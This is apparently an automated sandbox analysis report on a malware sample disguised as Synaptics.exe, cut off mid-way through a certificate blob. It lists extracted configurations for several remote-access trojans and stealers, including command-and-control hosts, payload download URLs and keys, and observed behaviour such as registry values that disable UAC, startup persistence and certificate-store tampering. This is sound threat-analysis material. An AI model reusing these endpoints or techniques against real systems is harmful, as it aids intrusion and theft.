Analysis
-
max time kernel
149s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
01-02-2025 09:21
Behavioral task
behavioral1
Sample
Synaptics.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Synaptics.exe
Resource
win10v2004-20250129-en
General
-
Target
Synaptics.exe
-
Size
764KB
-
MD5
85e3d4ac5a6ef32fb93764c090ef32b7
-
SHA1
adedb0aab26d15cf96f66fda8b4cfbbdcc15ef52
-
SHA256
4e5cc8cb98584335400d00f0a0803c3e0202761f3fbe50bcab3858a80df255e1
-
SHA512
a7a037bde41bcd425be18a712e27a793185f7fde638e139bbd9d253c371cd9622385eda39cf91ab715ead2591cff5b8c9f5b31d903f138d8af7bab6a9001ccab
-
SSDEEP
12288:6MSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9Ufbj:6nsJ39LyjbJkQFMhmC+6GD9mH
Malware Config
Extracted
xred
xred.mooo.com
-
payload_url
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
http://xred.site50.net/syn/SUpdate.ini
https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
http://xred.site50.net/syn/Synaptics.rar
https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
http://xred.site50.net/syn/SSLLibrary.dll
Extracted
njrat
v2.0
HacKed
heo.ddns.net:5552
Windows
-
reg_key
Windows
-
splitter
|-F-|
Extracted
quasar
1.4.1
Office04
biseo-48321.portmap.host:48321
cb74f432-50f1-4947-8163-7687a0292fb0
-
encryption_key
D1BBEF3C04D88FE8F97EE2745041632CE9C760EE
-
install_name
Svchost.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Svchost
-
subdirectory
Svchost
Extracted
xworm
5.0
127.0.0.1:8080
aVbGJnLt4HRONX59
-
install_file
USB.exe
Extracted
njrat
0.7d
HacKed
hakim32.ddns.net:2000
127.0.0.1:5552
a36391a4d2e3933c790f3bc33ca8c666
-
reg_key
a36391a4d2e3933c790f3bc33ca8c666
-
splitter
|'|'|
Extracted
asyncrat
0.5.8
Default
127.0.0.1:6606
127.0.0.1:7707
127.0.0.1:8808
8TdjLZxCzOjI
-
delay
3
-
install
true
-
install_file
client.exe
-
install_folder
%AppData%
Extracted
asyncrat
Beyond
-
c2_url_file
https://rentry.co/Spread4Filly/raw
-
delay
2
-
install
true
-
install_file
$77svchost.exe
-
install_folder
%AppData%
Extracted
lumma
https://sordid-snaked.cyou/api
https://awake-weaves.cyou/api
https://wrathful-jammy.cyou/api
https://debonairnukk.xyz/api
https://diffuculttan.xyz/api
https://effecterectz.xyz/api
https://deafeninggeh.biz/api
https://immureprech.biz/api
https://bellflamre.click/api
Extracted
quasar
1.4.1
RuntimeBroker
siembonik-44853.portmap.host:44853
df483a08-855b-4bf5-bdcb-174788919889
-
encryption_key
A8573AD4438B1D5F6207F7C03CCC7F1E2D4B13DF
-
install_name
RuntimeBroker.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
RuntimeBroker
-
subdirectory
am1
Extracted
quasar
1.4.1
powerstealer
192.168.56.1:4782
6760d0e9-9df9-4aba-89be-4e5ce3e92cc8
-
encryption_key
057FCAF700E62ACFECC7338C474084AF9B47ABEB
-
install_name
powerstealer.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Signatures
-
Asyncrat family
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x0005000000019217-315.dat family_xworm behavioral1/memory/996-317-0x00000000001C0000-0x00000000001CE000-memory.dmp family_xworm -
Lumma family
-
Njrat family
-
Quasar family
-
Quasar payload 23 IoCs
resource yara_rule behavioral1/files/0x00120000000190c6-296.dat family_quasar behavioral1/memory/2748-300-0x0000000000A20000-0x0000000000D44000-memory.dmp family_quasar behavioral1/memory/884-334-0x0000000001320000-0x0000000001644000-memory.dmp family_quasar behavioral1/memory/2632-372-0x00000000013C0000-0x00000000016E4000-memory.dmp family_quasar behavioral1/memory/308-385-0x0000000000040000-0x0000000000364000-memory.dmp family_quasar behavioral1/memory/2280-419-0x0000000000AF0000-0x0000000000E14000-memory.dmp family_quasar behavioral1/memory/2032-430-0x0000000001100000-0x0000000001424000-memory.dmp family_quasar behavioral1/memory/2912-441-0x0000000000190000-0x00000000004B4000-memory.dmp family_quasar behavioral1/memory/2756-556-0x0000000000AE0000-0x0000000000E04000-memory.dmp family_quasar behavioral1/memory/1452-611-0x00000000012C0000-0x00000000015E4000-memory.dmp family_quasar behavioral1/files/0x0009000000019c3a-613.dat family_quasar behavioral1/memory/292-615-0x0000000000A00000-0x0000000000D24000-memory.dmp family_quasar behavioral1/memory/2784-627-0x0000000000350000-0x0000000000674000-memory.dmp family_quasar behavioral1/memory/2976-636-0x0000000000190000-0x00000000004B4000-memory.dmp family_quasar behavioral1/memory/932-649-0x0000000000F20000-0x000000000124A000-memory.dmp family_quasar behavioral1/memory/2848-651-0x0000000001390000-0x00000000016B4000-memory.dmp family_quasar behavioral1/files/0x0005000000019db8-652.dat family_quasar behavioral1/memory/2684-654-0x0000000000EC0000-0x00000000011EA000-memory.dmp family_quasar behavioral1/memory/2612-663-0x00000000010E0000-0x0000000001404000-memory.dmp family_quasar behavioral1/memory/1884-691-0x00000000003F0000-0x0000000000714000-memory.dmp family_quasar behavioral1/memory/1536-720-0x0000000001330000-0x0000000001654000-memory.dmp family_quasar behavioral1/memory/2432-763-0x0000000000090000-0x00000000003B4000-memory.dmp family_quasar behavioral1/memory/1268-772-0x0000000001190000-0x00000000014B4000-memory.dmp family_quasar -
UAC bypass 3 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" reg.exe -
Xred family
-
Xworm family
-
Async RAT payload 2 IoCs
resource yara_rule behavioral1/files/0x0006000000019263-388.dat family_asyncrat behavioral1/files/0x00050000000196ac-616.dat family_asyncrat -
Downloads MZ/PE file 10 IoCs
flow pid Process 26 3028 ._cache_Synaptics.exe 26 3028 ._cache_Synaptics.exe 26 3028 ._cache_Synaptics.exe 26 3028 ._cache_Synaptics.exe 26 3028 ._cache_Synaptics.exe 26 3028 ._cache_Synaptics.exe 77 2272 ._cache_Synaptics.exe 77 2272 ._cache_Synaptics.exe 77 2272 ._cache_Synaptics.exe 142 3028 ._cache_Synaptics.exe -
Modifies Windows Firewall 2 TTPs 3 IoCs
pid Process 1052 netsh.exe 1436 netsh.exe 2356 netsh.exe -
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 3024 attrib.exe -
Drops startup file 5 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe server.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a36391a4d2e3933c790f3bc33ca8c666Windows Update.exe server.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a36391a4d2e3933c790f3bc33ca8c666Windows Update.exe server.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk heo.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe server.exe -
Executes dropped EXE 43 IoCs
pid Process 3028 ._cache_Synaptics.exe 1632 Synaptics.exe 2272 ._cache_Synaptics.exe 2540 heo.exe 2748 Client-built.exe 2844 srtware.exe 996 XClient.exe 2112 trojan.exe 884 Svchost.exe 2380 server.exe 2632 Svchost.exe 308 Svchost.exe 2392 Terminal_9235.exe 2184 client.exe 2280 Svchost.exe 2032 Svchost.exe 2912 Svchost.exe 688 svchost.exe 2040 Loader.exe 1528 Loader.exe 2756 Svchost.exe 1452 RuntimeBroker.exe 292 RuntimeBroker.exe 2224 $77svchost.exe 2784 Svchost.exe 2976 RuntimeBroker.exe 932 Discord.exe 2848 Svchost.exe 2684 powerstealer.exe 2612 RuntimeBroker.exe 1500 Svchost.exe 2236 RuntimeBroker.exe 1884 Svchost.exe 2852 RuntimeBroker.exe 1876 av_downloader.exe 1644 AV_DOW~1.EXE 1536 Svchost.exe 1012 RuntimeBroker.exe 544 Svchost.exe 2300 World%20of%20Tanks.exe 1920 RuntimeBroker.exe 2432 Svchost.exe 1268 RuntimeBroker.exe -
Loads dropped DLL 31 IoCs
pid Process 2744 Synaptics.exe 2744 Synaptics.exe 2744 Synaptics.exe 1632 Synaptics.exe 1632 Synaptics.exe 1632 Synaptics.exe 3028 ._cache_Synaptics.exe 3028 ._cache_Synaptics.exe 3028 ._cache_Synaptics.exe 2864 Process not Found 2316 WerFault.exe 2316 WerFault.exe 2316 WerFault.exe 3028 ._cache_Synaptics.exe 2316 WerFault.exe 3028 ._cache_Synaptics.exe 3028 ._cache_Synaptics.exe 2112 trojan.exe 2112 trojan.exe 3028 ._cache_Synaptics.exe 2748 cmd.exe 2272 ._cache_Synaptics.exe 2272 ._cache_Synaptics.exe 2272 ._cache_Synaptics.exe 2040 Loader.exe 3028 ._cache_Synaptics.exe 2272 ._cache_Synaptics.exe 3028 ._cache_Synaptics.exe 3028 ._cache_Synaptics.exe 2272 ._cache_Synaptics.exe 2272 ._cache_Synaptics.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe" Synaptics.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\e: cmd.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 25 raw.githubusercontent.com 26 raw.githubusercontent.com 77 raw.githubusercontent.com -
Drops autorun.inf file 1 TTPs 4 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.
description ioc Process File created C:\autorun.inf server.exe File opened for modification C:\autorun.inf server.exe File created F:\autorun.inf server.exe File opened for modification F:\autorun.inf server.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2040 set thread context of 1528 2040 Loader.exe 107 -
Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
pid Process 3036 mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 22 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ._cache_Synaptics.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Synaptics.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Terminal_9235.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Synaptics.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language trojan.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language av_downloader.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EXCEL.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language client.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Loader.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Loader.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language World%20of%20Tanks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ._cache_Synaptics.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language heo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AV_DOW~1.EXE -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 22 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 328 PING.EXE 2804 PING.EXE 2208 PING.EXE 2544 PING.EXE 1216 PING.EXE 1652 PING.EXE 2512 PING.EXE 2072 PING.EXE 2900 PING.EXE 2032 PING.EXE 1628 PING.EXE 2472 PING.EXE 768 PING.EXE 2688 PING.EXE 1000 PING.EXE 1112 PING.EXE 1652 PING.EXE 2772 PING.EXE 2948 PING.EXE 2980 PING.EXE 632 PING.EXE 1216 PING.EXE -
Delays execution with timeout.exe 2 IoCs
pid Process 1560 timeout.exe 1896 timeout.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies system certificate store 2 TTPs 8 IoCs
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a $77svchost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 ._cache_Synaptics.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e ._cache_Synaptics.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e ._cache_Synaptics.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 ._cache_Synaptics.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e ._cache_Synaptics.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 $77svchost.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5